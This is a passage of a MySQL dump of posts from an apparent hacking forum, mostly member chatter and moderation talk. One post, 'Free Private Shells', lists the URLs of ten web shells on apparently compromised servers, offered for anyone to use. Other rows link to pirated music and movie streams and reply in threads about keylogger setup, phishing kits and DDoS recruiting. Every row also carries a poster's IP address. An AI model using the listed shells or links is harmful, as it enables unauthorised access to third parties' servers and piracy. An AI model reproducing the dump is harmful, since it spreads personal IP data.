2011[/B]\r\n[CODE]http://turbobit.net/4ihpgal5n5ps/Slipknot-Iowa_(10th_Anniversary_Edition)-2CD-2011-FiH.rar.html[/CODE]\r\n\r\n[B]Blink - 182 - Greatest Hits 2005 320[/B]\r\n[CODE]http://turbobit.net/8nlr8jmyek5f/Blink-182_-_Greatest_Hits_2005_320.zip.html[/CODE][/php]\r\n[/quote]', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', '30197718cd2f822a2b744ba2f9b6a88f', '0', '0'); INSERT INTO mybb_posts VALUES('6119', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '228', 'VirtualLegend', '1350911341', 'I have the Same problem :(', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ae413b935993111c6008e27b83700a47', '0', '0'); INSERT INTO mybb_posts VALUES('6120', '1062', '0', '64', 'New movie stream site I found!!', '0', '62', 'R?????zo?', '1350911603', 'Hello guys I just found a new site and I think it\'s awesome, so I decided to share with you guys :)\r\n\r\nHave a look:\r\n\r\nhttp://www.letmewatchthis.com', '188.140.93.237', '-1131651603', '1', '0', '0', '0', '1', 'b1e13f021a2a99e8866badbe14e381c5', '0', '0'); INSERT INTO mybb_posts VALUES('6121', '1063', '0', '81', 'Free Private Shells [Updated]', '0', '62', 'R?????zo?', '1350911895', 'Updated list.\n\nhttp://pastebin.com/s3taxucN\n\n\nDon\'t expect them to stay up long, they\'re public now.\n[hr]\nSome more: \n[spoiler]\nhttp://187.33.159.118/webdav/shellajejas.php \nhttp://200.128.81.23/webdav/shellajejas.php \nhttp://74.91.116.127/webdav/shellajejas.php \nhttp://187.48.62.39/webdav/shellajejas.php \nhttp://118.97.164.18/webdav/shellajejas.php \nhttp://222.127.10.240/webdav/shellajejas.php \nhttp://119.82.231.91/webdav/shellajejas.php \nhttp://193.140.142.110/webdav/shellajejas.php \nhttp://188.173.78.190/webdav/shellajejas.php \nhttp://120.72.85.84/webdav/shellajejas.php\n[/spoiler]', '188.140.93.237', '-1131651603', '1', '0', '62', '1350939216', '1', '0f0f07fa649ce0835aeb51a7cc4de7be', '0', '1350939216'); INSERT INTO mybb_posts VALUES('6122', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '228', 'VirtualLegend', '1350913591', 'Does it work for youtube to get views?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a055101700244ca51bc5be61ec1821cd', '0', '0'); INSERT INTO mybb_posts VALUES('6123', '1064', '0', '4', 'Greetings from NowhereLand', '0', '284', 'h3rcul3s', '1350916547', 'New member here. Willing to learn and share knowledge.', '142.4.196.218', '-1912290086', '0', '0', '0', '0', '1', '6ff9a3dedfb3c49ca434179cdba0b491', '0', '0'); INSERT INTO mybb_posts VALUES('6124', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '53', 'sirchamp', '1350918772', '1. Do you have any spare email? I can easily make one.\n2. Do you know any hacker blogs? A few..\n3. Can you help advertise on twitter? Yes\n4. What search engine do you use? Google and Ecosia\n5. Do you upload videos on youtube? Yes. \n6. Are you registered on any active site that\'s not related to hacking? Yes. Only one\n7. Are you registered on [censored] or ubers? On HF. I love HF.\n8. If we provide you with programs and ebooks, can you share them on other sites? Of course.', '107.248.162.109', '1811456621', '1', '0', '0', '0', '1', 'c40f4c4c945b5f2dc46363ac09ef76be', '0', '0'); INSERT INTO mybb_posts VALUES('6125', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '53', 'sirchamp', '1350918865', 'If I\'m forced to post... then Ill do it.', '165.42.14.50', '-1523970510', '1', '0', '0', '0', '1', '019d15066bc01031b6bb9ce537fc8078', '0', '0'); INSERT INTO mybb_posts VALUES('6126', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '61', 'NXK', '1350919733', 'Welcome, I hope you enjoy it here.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9d128dcf535dda3461a2eab69a298950', '0', '0'); INSERT INTO mybb_posts VALUES('6127', '1065', '0', '5', 'We have a problem here.', '0', '61', 'NXK', '1350919907', 'Recently I have been noticing that me and joker are doing more moderating than our actual staff/mods\r\n\r\nThis needs to change soon, We shouldn\'t be doing 100% of moderating. I feel like most of you are just mods right now to have the title mod. \r\n\r\nLike I said this needs to change.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4f6f8b38a3f8e25788d5ae0b9b774aad', '0', '0'); INSERT INTO mybb_posts VALUES('6128', '1066', '0', '48', 'We have a problem here.', '0', '61', 'NXK', '1350919962', 'Recently I have been noticing that me and joker are doing more moderating than our actual staff/mods\r\n\r\nThis needs to change soon, We shouldn\'t be doing 100% of moderating. I feel like most of you are just mods right now to have the title mod. \r\n\r\nLike I said this needs to change.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '69305906d5a0d35ba913ee4324a58901', '0', '0'); INSERT INTO mybb_posts VALUES('6129', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '228', 'VirtualLegend', '1350921743', 'Welcome to L33tHacking Hercules\n\nStay active and HQ', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '7df3b3023c0f1c0ad9ca3402765e93a9', '0', '0'); INSERT INTO mybb_posts VALUES('6130', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '228', 'VirtualLegend', '1350921857', 'As Always Nice share bro\n\nGonna check it out and SE.net too :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b4c1e84a84c3c3099a06cd0256e9d802', '0', '0'); INSERT INTO mybb_posts VALUES('6132', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '100', '??zg???g????61', '1350922027', 'Thanks for this man, been looking for some more SE tuts. ;D', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', 'e74802b0197cef9d2615efe2bc836023', '0', '0'); INSERT INTO mybb_posts VALUES('6133', '1012', '5721', '16', 'RE: Huge SE Dump', '0', '62', 'R?????zo?', '1350923416', 'you\'re welcome guys, glad I helped :)', '95.69.16.73', '1598361673', '1', '0', '0', '0', '1', 'ab728f60b885ac17577fffa7e3b9b17f', '0', '0'); INSERT INTO mybb_posts VALUES('6134', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '62', 'R?????zo?', '1350923448', 'Welcome to the forums, stay active and HQ\nEnjoy :)', '95.69.16.73', '1598361673', '1', '0', '0', '0', '1', '26bb4edece6c30b13bbf07cfa43c02f0', '0', '0'); INSERT INTO mybb_posts VALUES('6135', '1059', '6092', '9', 'RE: new ptc site with more earning option', '0', '84', 'Thunder™', '1350923720', 'Thanks for Share :) will try this.', '111.91.75.60', '1868254012', '0', '0', '0', '0', '1', '6f903d12bcdc8deac8ddcdf590aff19b', '0', '0'); INSERT INTO mybb_posts VALUES('6136', '1066', '6128', '48', 'RE: We have a problem here.', '0', '228', 'VirtualLegend', '1350925759', 'I\'m i doing good? so not what do i need to change?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '610f79b06bb3a890b01d14260236b853', '0', '0'); INSERT INTO mybb_posts VALUES('6137', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1350927180', 'Hopefully jok3r can fix it :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'adddab8741ac19e32ae5e4a581014459', '0', '0'); INSERT INTO mybb_posts VALUES('6138', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '222', 'Exposé', '1350927286', 'Welcome to LH and hope you can be active and enjoy it here!', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'abe6fedc7d7be08b21f41f1b8ff4d743', '0', '0'); INSERT INTO mybb_posts VALUES('6139', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '258', 'PiXEL^OG', '1350927829', 'Hi there , welcome to LH stay HQ and enjoy :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '609ec9c04638610d0831c0208c232cc3', '0', '0'); INSERT INTO mybb_posts VALUES('6140', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350929196', 'I\'ve made an updated version of the userbar, hopefully it fits your needs :)\n[img]http://i.imgur.com/Oy86Y.gif[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '11daa7500244ad1227dd116aaeadb322', '0', '0'); INSERT INTO mybb_posts VALUES('6141', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '228', 'VirtualLegend', '1350937544', 'To risky for me, If i get caught than I\'m in a deep shit', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'fa760a11f550162f15b40798129c1879', '0', '0'); INSERT INTO mybb_posts VALUES('7245', '1211', '7170', '18', 'RE: Facebook Blaster Pro v10.0', '0', '53', 'sirchamp', '1352387169', 'Lol. Nice stuff you have timmy.. Post to unlock', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'f013d0982a9e8e6416067923664dc868', '0', '0'); INSERT INTO mybb_posts VALUES('6143', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '1', 't3h jok3r', '1350937646', 'Glad to make the 6000th post on L33T Hacking.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a1e51af52225bc23352df22e71f52df5', '0', '0'); INSERT INTO mybb_posts VALUES('6144', '1031', '6125', '7', 'RE: Testing new plugin public', '0', '1', 't3h jok3r', '1350937779', 'Correct it blocks all the links but it\'s because it\'s in the same postbit so if I try to remove it from the sig then it will be removed from the post message. \r\n\r\n[quote=\'sirchamp\' pid=\'6125\' dateline=\'1350918865\']\r\nIf I\'m forced to post... then Ill do it.\r\n[/quote]\r\n\r\nLol thanks but this will only be for people that want to help LH get more posts and AVOID post here and PM me shit. This should be used in download links and passwords.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '26c44d5c181a90b2cd256c46620f7023', '0', '0'); INSERT INTO mybb_posts VALUES('6145', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '9', 'p420', '1350937875', 'Posting to check what\'s the buzz all about', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '69c50ccf930868b7354d73c9923d4154', '0', '0'); INSERT INTO mybb_posts VALUES('6146', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '260', 'micheal010', '1350938250', 'thanks, good job! will be very happy if it works perfectly.....', '196.46.245.49', '-1003555535', '0', '0', '0', '0', '1', '479092394463ae8d29d8552790a2cffd', '0', '0'); INSERT INTO mybb_posts VALUES('6147', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '8', 'spacefish36', '1350938257', 'Nice will keep leechs out n less phpm', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '0a92bd7fe8ccc696622dc7aa017c23a8', '0', '0'); INSERT INTO mybb_posts VALUES('6148', '918', '5088', '65', 'RE: I feel famous', '0', '82', 'iTzIpod', '1350938452', 'Yeah I saw that. :p\n\nChecking it out.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2ceb7eeec44862fa0a0d328681c4ef7e', '0', '0'); INSERT INTO mybb_posts VALUES('6149', '1063', '6121', '81', 'RE: Free Private Shells [Updated]', '0', '82', 'iTzIpod', '1350938499', 'Put them in a spoiler or code or something?\n:p\nPosting to view.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9c688de98fa64f0a1dfff18ba5d00c90', '0', '0'); INSERT INTO mybb_posts VALUES('6150', '806', '4225', '58', 'RE: [NEW] (Recruiting) DDoS\'ers - Join today', '0', '82', 'iTzIpod', '1350938583', 'Good luck with the applications and group yourself! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd4b5ffa404e924742d3cb9bac50aecdc', '0', '0'); INSERT INTO mybb_posts VALUES('6151', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1350938711', 'I don\'t seem to experience this problem? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cc167295114d5008d9c1f911a36452c', '0', '0'); INSERT INTO mybb_posts VALUES('6152', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '82', 'iTzIpod', '1350938754', 'Welcome to LH \n\nEnjoy your stay! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a836a8d0932ad240ceb258956159def2', '0', '0'); INSERT INTO mybb_posts VALUES('6153', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1350938799', 'That controller looks too big in my opinion. :p\nBut it\'s still good!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0aaf6653575397a0721ea0ff962d1692', '0', '0'); INSERT INTO mybb_posts VALUES('6154', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350938833', 'Pssh I made the 6000th post on LH o.O', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'abc187b6f738f5dede66147aef6117dc', '0', '0'); INSERT INTO mybb_posts VALUES('6155', '1045', '6037', '49', 'RE: Group Format?', '0', '82', 'iTzIpod', '1350938911', 'Yeah. I want the Unique color to be something unique. Like Pink or so. I don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6d621fd7c960520e3f780e4a00d02d8', '0', '0'); INSERT INTO mybb_posts VALUES('6156', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350938966', 'Marketers will be added soon :)\nI\'m gonna be the 1st member to be in it :3\nI hope..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a0364c9789c5039e6bb39358971af0c0', '0', '0'); INSERT INTO mybb_posts VALUES('6157', '1066', '6136', '48', 'RE: We have a problem here.', '0', '61', 'NXK', '1350939105', '[quote=\'VirtualLegend\' pid=\'6136\' dateline=\'1350925759\']\r\nI\'m i doing good? so not what do i need to change?\r\n[/quote]\r\n\r\nStart handling threads in your sections, Make sure they\'re in the right area things like that.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'c9f376c477d584c3bebf1f12f2ca9754', '0', '0'); INSERT INTO mybb_posts VALUES('6158', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350939178', 'Bleh I will fix it later :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '730a0dc86560feae7e7e8ce598070cb4', '0', '0'); INSERT INTO mybb_posts VALUES('6159', '1063', '6121', '81', 'RE: Free Private Shells [Updated]', '0', '62', 'R?????zo?', '1350939240', 'Done :)\nSorry maybe it was annoying for you since it had a bunch of links :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'a176ba9b324c40306e8cb2c5bede6ec5', '0', '0'); INSERT INTO mybb_posts VALUES('6160', '765', '3901', '46', 'RE: Vulcan Private Pisher Generator', '0', '62', 'R?????zo?', '1350939280', 'Thanks, looks awesome bro :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'bc8ec6044db2c1c21f8d442fa30456b7', '0', '0'); INSERT INTO mybb_posts VALUES('6161', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350939485', 'I will explain a little bit about this later lol', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '6ad41b9fc586dbcf4b5bfefca7143ca0', '0', '0'); INSERT INTO mybb_posts VALUES('6162', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '62', 'R?????zo?', '1350939495', 'thanks, this might come handy :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ccce1fb1b65e7eeb1df92c82f528c183', '0', '0'); INSERT INTO mybb_posts VALUES('6163', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1350939501', 'I really like that one, Ill add it soon! It\'s awesome man thank you.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'ee39e47b6f47e3cf09b7cb193abe1af7', '0', '0'); INSERT INTO mybb_posts VALUES('6164', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '62', 'R?????zo?', '1350940067', 'I made 2 more:\n\n[img]http://i.imgur.com/p3p8L.gif[/img]\n\n[img]http://img547.imageshack.us/img547/2716/gamersuserbar4.gif[/img]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'ea4f836cc38e50e64af6c9ce45fe8a99', '0', '0'); INSERT INTO mybb_posts VALUES('6165', '212', '6156', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350940082', '[quote=\'iTzIpod\' pid=\'6156\' dateline=\'1350938966\']\r\nMarketers will be added soon :)\r\nI\'m gonna be the 1st member to be in it :3\r\nI hope..\r\n[/quote]\r\n\r\nLol I thought i was the first one Don\'t you think ?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a3a404e63ca182111fc58361c9df4248', '0', '0'); INSERT INTO mybb_posts VALUES('6166', '1045', '6155', '49', 'RE: Group Format?', '0', '62', 'R?????zo?', '1350940160', '[quote=\'iTzIpod\' pid=\'6155\' dateline=\'1350938911\']\r\nYeah. I want the Unique color to be something unique. Like Pink or so. I don\'t know.\r\n[/quote]\r\n\r\nI would love to see my username as pink :$ (no homo)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '32cfb245afbd9f9c41db1d0dcc13551f', '0', '0'); INSERT INTO mybb_posts VALUES('6167', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '62', 'R?????zo?', '1350940210', 'you\'re leading with too much posts bro :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd4cd5f01a49744f4f4113f71516d8ab2', '0', '0'); INSERT INTO mybb_posts VALUES('6168', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '228', 'VirtualLegend', '1350940296', 'L33thacking has already more than 1000 threads.\n\nAll members Good job, and keep it up', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '6abca6f71ec0ab3df0eb04eddc8ff987', '0', '0'); INSERT INTO mybb_posts VALUES('6169', '30', '84', '12', 'RE: HOW TO SETUP RINLOGGER [COMPLETE AND EASY]', '0', '61', 'NXK', '1350940383', 'I used to use this a long time ago when I was into this kind of stuff, It\'s pretty awesome Ill vouch for it.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '173220c84f0d0c9505d07da153c4d546', '0', '0'); INSERT INTO mybb_posts VALUES('6170', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '285', 'dccfoux', '1350943375', 'nice share! thanks for the dropbox as well!', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '129e5896eda794de376572569f4cf12c', '0', '0'); INSERT INTO mybb_posts VALUES('6171', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '285', 'dccfoux', '1350943465', 'wow, a nice, very long tut. Good job!', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', 'be62bf1fcf30205ca4839af996b0779a', '0', '0'); INSERT INTO mybb_posts VALUES('6172', '1045', '6037', '49', 'RE: Group Format?', '0', '222', 'Exposé', '1350943512', 'No this isn\'t for people to get different colors and shit like coders and etc...I mean\'t so like if an admin is red...it shows up on the sections so it\'s easier to see who posted', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '058162ac1c504c98d67755a7038f3503', '0', '0'); INSERT INTO mybb_posts VALUES('6173', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '222', 'Exposé', '1350943547', 'I think I had an infection the other day....just formated my pc lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '9db365d440fb51b3f2dc6a3d2d00afa5', '0', '0'); INSERT INTO mybb_posts VALUES('6174', '1067', '0', '24', 'AMD or intel', '0', '285', 'dccfoux', '1350943568', 'Which do you think is better? AMD or intel. Personally for me intel. They are just way ahead of AMD. But AMD does have some nice, low-priced cpus.', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '4723b4ccb54472b2af7d5d41019855a4', '0', '0'); INSERT INTO mybb_posts VALUES('6175', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '222', 'Exposé', '1350943579', 'Yeh we are getting more and more of these milestones completed :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '786d67de6111022cf025977810652395', '0', '0'); INSERT INTO mybb_posts VALUES('6176', '613', '6164', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1350946897', '[img]http://i.imgur.com/p3p8L.gif[/img]\r\nThis is it. I like', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7907de1149a1d5b1601459a20e1fa58f', '0', '0'); INSERT INTO mybb_posts VALUES('6177', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350946930', 'Or, I can be the 2nd member. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7e37522b342cec59a4d0dfe68d2b7a9b', '0', '0'); INSERT INTO mybb_posts VALUES('6178', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '82', 'iTzIpod', '1350947163', 'I was recently infected with a RAT a couple weeks ago. I don\'t remember when but it was my first time. I downloaded something from LeakForums and forgot to run it in Sandboxie and all. And got my computer infected. Good thing I had another friend that is a Pro RATer and RATs people and all. And he removed it for me.\nI would\'ve asked for your assistance but you weren\'t on.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fe3cbcf49f4db1366b2fec2f55a15f19', '0', '0'); INSERT INTO mybb_posts VALUES('6179', '861', '4598', '7', 'RE: L33T Hacking Milestones', '0', '82', 'iTzIpod', '1350947210', 'Weird.. I made 20% of total posts :p I feel like a spammer :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fcfdd8c88d3d7f86c90c29b230a8213d', '0', '0'); INSERT INTO mybb_posts VALUES('6190', '1067', '6174', '24', 'RE: AMD or intel', '0', '205', 'mothered', '1350993995', 'I\'ve always been an Intel fan, and only deal with Intel.\r\n\r\nHad a few bad experiences with AMD.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5a3416b93fb20498328e2bd31264c8e6', '0', '0'); INSERT INTO mybb_posts VALUES('6191', '1058', '6090', '24', 'RE: Microsoft or Apple', '0', '205', 'mothered', '1350994083', 'Definitely Microsoft.\r\n\r\nFor all my computational day to day tasks, and compatibility reasons, Microsoft In certainly the way to go.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd89be51253a95f5d9856d431ef790489', '0', '0'); INSERT INTO mybb_posts VALUES('6192', '532', '6173', '23', 'RE: Think you have an infection? Click Here.', '0', '205', 'mothered', '1350994329', '[quote=\'Exposé\' pid=\'6173\' dateline=\'1350943547\']\r\nI think I had an infection the other day....just formated my pc lmao\r\n[/quote]\r\n\r\nAbsolutely agree.\r\n\r\nI don\'t bother with system scans, etc. If you\'re organized, you\'ll be up and running within 2 hours by hitting a clean Installation of Windows.\r\n\r\nAnyhow, that said, this Is a great tutorial Indeed.\r\nNice work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ffa6a1ec90edbe60ef3943d30c975f63', '0', '0'); INSERT INTO mybb_posts VALUES('6193', '874', '4744', '7', 'RE: N.A.S.A HACKED', '0', '285', 'dccfoux', '1350995425', '[quote=\'XxTREYZxX\' pid=\'4744\' dateline=\'1350276589\']\r\ni think they need to upgrade their security settings.\r\n[/quote]\r\n\r\nlol, its not just as easy as that. A guy hacked and controlled a car that had Onstar on it. But if they blocked the hack the product would not work anymore', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '44ea256ca9ad84dc412a744b58a17b8e', '0', '0'); INSERT INTO mybb_posts VALUES('6194', '1070', '0', '7', 'How many hours a day are you online?', '0', '205', 'mothered', '1350998892', 'Greetings everyone,\r\n\r\nAs the title reads, how many hours a day are you online?\r\n\r\nOn a non-work day, I hit anywhere between 12 -14 hours. When I have work the following day, probably half that amount (I try and get early nights).\r\n\r\nHow about you guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'cb1db115042e080a37c238efd7ebe4fa', '0', '0'); INSERT INTO mybb_posts VALUES('6195', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '53', 'sirchamp', '1351005289', 'I have the same problem. You just have to refresh the page after you pressed \"Post Reply\".', '161.245.25.243', '-1577772557', '1', '0', '0', '0', '1', '784373958321b39cf667f59512a0121f', '0', '0'); INSERT INTO mybb_posts VALUES('6196', '1056', '6083', '9', 'RE: make money by shortening websites', '0', '53', 'sirchamp', '1351005405', 'We already have a thread about adf.ly. And it wasnt written in 30 seconds...', '73.30.238.181', '1226763957', '1', '0', '0', '0', '1', '33da355cd61dc9330fffda58d0cf0b41', '0', '0'); INSERT INTO mybb_posts VALUES('6197', '1060', '6151', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351007531', '[quote=\'iTzIpod\' pid=\'6151\' dateline=\'1350938711\']\r\nI don\'t seem to experience this problem? :/\r\n[/quote]\r\n\r\nwhat browser do you use?', '92.250.52.128', '1559901312', '1', '0', '0', '0', '1', '06869e04505685a1a05b3363332de61c', '0', '0'); INSERT INTO mybb_posts VALUES('6198', '918', '6085', '65', 'RE: I feel famous', '0', '264', 'D?ea', '1351011709', '[quote=\'VirtualLegend\' pid=\'6085\' dateline=\'1350902619\']\r\nDo you already have adsense on your YT account. And how much did you maked?\r\n[hr]\r\nDo you have adsense on your YT channel\r\n[hr]\r\nDo you have adsense on your YT channel\r\n[hr]\r\nDo you have adsense on your YT channel\r\n[hr]\r\nDo you have adsense on your YT channel\r\n[hr]\r\nLol i found a bug with the new plugin\r\n[/quote]\r\nYes I have, I have made $50 on this video so far.', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', '93a29166a07054995b9c0ead3093870a', '0', '0'); INSERT INTO mybb_posts VALUES('6199', '1071', '0', '3', 'VirtualLegend - banned?', '0', '264', 'D?ea', '1351011779', 'VirtualLegend tells me over Skype that he is IP banned.\r\nDafoq?', '178.157.194.171', '-1298283861', '1', '0', '0', '0', '1', 'c8a67f5c9a3fba6537305b3934ea3bea', '0', '0'); INSERT INTO mybb_posts VALUES('6200', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '222', 'Exposé', '1351012716', 'IP banned from LH. I really doubt it unless he did something to go against the community. He might be still haveing some cloudflare issues or something', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '5911efb0639719e5fd6f4f0372db26ac', '0', '0'); INSERT INTO mybb_posts VALUES('6201', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '222', 'Exposé', '1351012762', 'Lol im on like 15 hours a day. I have work at night usually so im not on 24/7', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'e0616006059669b91d263a773e69e0b7', '0', '0'); INSERT INTO mybb_posts VALUES('6202', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '1', 't3h jok3r', '1351013812', 'He must be banned from Cloudflare by mistake. I can only unban him when I\'m home.', '165.155.212.126', '-1516514178', '1', '0', '0', '0', '1', 'c97519d5830f75bdaf21b5e3f65055be', '0', '0'); INSERT INTO mybb_posts VALUES('6203', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '53', 'sirchamp', '1351017305', 'Lol. That happened to me too. A long time ago :D', '54.9.241.166', '906621350', '1', '0', '0', '0', '1', 'aede68fbcce2e41a841979a22e71bf21', '0', '0'); INSERT INTO mybb_posts VALUES('6204', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '82', 'iTzIpod', '1351019981', 'Possibly CloudFlare banned his IP.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e369b4aa01011c7c8ae00f7ace117bf5', '0', '0'); INSERT INTO mybb_posts VALUES('6205', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1351020015', 'Lol I hope he chooses the one I posted above your post. xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1d4a4679286767ea95b3496fc1c049f6', '0', '0'); INSERT INTO mybb_posts VALUES('6206', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1351020077', 'It says \n\nModerated by -Name-\n\nOr, it say it on the Recruitment Thread.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d4265700bb3ce8580f19f7bef2e2fb1', '0', '0'); INSERT INTO mybb_posts VALUES('6207', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351020141', 'I use Google Chrome .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '256dad4b2fa4c7c4079bd1f755f5d44b', '0', '0'); INSERT INTO mybb_posts VALUES('6208', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '82', 'iTzIpod', '1351020202', 'Umm. I\'m not sure how long I\'m on a day. Weekdays, I come home at 3 PM. \nSomewhere between 2-3 hours or so..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '230b175ec44a96c6baae98eb1158ee4a', '0', '0'); INSERT INTO mybb_posts VALUES('6209', '1051', '6060', '58', 'RE: Advertisers Applications', '0', '199', 'Anonymous™', '1351023474', '1. Do you have any spare email? Yes.\n2. Do you know any hacker blogs? A few i guess.\n3. Can you help advertise on twitter? Yes.\n4. What search engine do you use? Google\n5. Do you upload videos on youtube? Yep!\n6. Are you registered on any active site that\'s not related to hacking? Yes.\n7. Are you registered on [censored] or ubers? Registered on ubers.\n8. If we provide you with programs and ebooks, can you share them on other sites? Why not?', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'b3312dc8b5707940a2687f85b9a82405', '0', '0'); INSERT INTO mybb_posts VALUES('6210', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '199', 'Anonymous™', '1351023687', 'Sorry for this boring post but I saw a good movie called Middle of Nowhere, I just thought it was very good and I think that if you have not seen it, you should do it.\n\nLink: http://www.tubeplus.me/player/357222/Middle_of_Nowhere/', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 